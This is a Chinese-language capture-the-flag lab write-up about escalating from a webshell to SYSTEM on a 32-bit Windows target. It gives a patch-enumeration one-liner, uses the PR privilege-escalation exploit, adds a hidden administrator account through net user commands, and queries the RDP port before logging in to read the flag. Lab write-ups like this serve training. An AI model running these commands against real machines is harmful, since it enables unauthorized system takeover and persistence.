第六章 SYSTEM!POWER
0x01. 明确目标
https://hack.zkaq.cn/battle/target?id=3eb7bec4a7e95297
嘿嘿 , 不知道你笑了没 , 点击传送门 , 发现点不开 , 之好点击备用传送门了 , 嘿嘿
四层相识的感觉 , 废话不就是上一章那webshell的站点吗 , ok 通过webshell 提权 , 然后flag在c盘根目录下
获取webshell的方法 , 我就不介绍了 , 直接看第五章即可
0x02. 提权
尝试直接读取c:\flag.txt , 发现果然没有权限
在caidao打开终端 , 查看当前用户权限
发现拒绝访问 , 也就是当前用户的权限 , 不能执行默认的cmd.exe , 我们可以尝试自己上传一个cmd.exe到可执行
目录下 , 注意这台靶机是32位的 , 要用32位的cmd.exe
紧接着在菜刀中设置终端为当前上传的cmd.exe
setp D:\05\06\UploadFiles\cmd.exe
通过命令查看可利用的exp提权漏洞
systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB952004 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i you can fuck)&del /f /q /a micropoor.txt
发现没有打KB952004这个补丁 , 可以通过PR提权 , 上传pr
通过pr.exe运行系统命令 , 提权成功
0x03. 获取flag
接下来做的就是添加管理员账号 , 3389远程连接靶机 , 查看flag
添加管理员账号
pr.exe "net user yjh 123456 /add"
pr.exe "net localgroup administrators yjh /add"
查看是否开否终端服务以及对应的端口是否为3389
net start
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
0xd3d转换成十进制就是3389
使用远程桌面连接 , 连接靶机
win + r --> 输入 迷失天使城的首字母(mstac) --> 回车 , 输入靶机的公网ip
59.63.200.79
哎呦一激动忘记截图了 , 我相信各位师傅你们都会
获取flag
zkz{F3ck_power_sysstem}